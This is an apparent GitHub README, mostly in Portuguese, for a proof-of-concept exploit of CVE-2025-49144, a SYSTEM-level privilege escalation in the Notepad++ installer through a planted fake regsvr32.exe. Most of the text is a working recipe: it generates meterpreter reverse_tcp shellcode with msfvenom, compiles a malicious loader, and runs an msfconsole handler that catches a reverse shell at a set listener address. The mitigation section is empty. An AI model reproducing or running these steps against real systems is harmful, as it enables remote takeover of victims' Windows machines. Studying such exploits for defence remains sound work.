
CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-level POC
CVE-2025-49144 * Notepad++ v8.8.1 * POC de nível SYSTEM

📌 CVE-2025-49144 é uma vulnerabilidade de escalada de privilégio local de alta gravidade encontrada nos instaladores do Notepad++ v8.8.1 e versões anteriores. Esta vulnerabilidade decorre do comportamento de caminho de pesquisa de executável não controlado durante a instalação, permitindo que um atacante local obtenha privilégios de nível SYSTEM ao colocar executáveis maliciosos no mesmo diretório do instalador.
⚙️ Como o CVE funciona – Passo a Passo:
🧱 1. O que deu errado no instalador?
O instalador do Notepad++ (antes do v8.8.2) chama regsvr32.exe para registrar alguns componentes — mas faz isso sem fornecer o caminho completo (como C:\Windows\System32\regsvr32.exe).
Em vez disso, ele apenas executa:
regsvr32.exe some_dll
📂 2. Comportamento do caminho de pesquisa do Windows: Quando um executável é iniciado sem um caminho completo, o Windows usa uma ordem de pesquisa específica para encontrar o arquivo:
Então, se um regsvr32.exe falso for colocado na mesma pasta que o instalador (ex.: Downloads), o Windows o usará antes do real.
💣 3. Exploração:
⚙️ Passos para Reproduzir:
Obter shellcode:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
Baixe o arquivo "regsvr32_loader.c" e edite-o. Cole todo o shellcode de shellcode.txt no comentário mencionado. Compile para regsvr32.exe:
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
Implante um ouvinte meterpreter:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
run
Baixe uma versão vulnerável do Notepad++, ou seja, anterior à 8.8.1, pois a 8.8.1 agora é atualizada automaticamente. Para o PoC, usei o Notepad++ v8.6.8 Mova o arquivo "regsvr32.exe" para o sistema Windows na mesma pasta do instalador do Notepad++, provavelmente na pasta Downloads. Conclua a instalação do instalador do Notepad++. Nota: Este é um PoC, portanto testado com o Windows Defender e a proteção em tempo real desabilitados.
✅ Mitigação
Usuários e administradores devem:
🏷️ Licença Licença MIT — Gratuito apenas para fins educacionais, de pesquisa e defensivos.
🤝 Contribuindo Pull Requests são bem-vindos — melhore a detecção, adicione recursos ou sugira correções.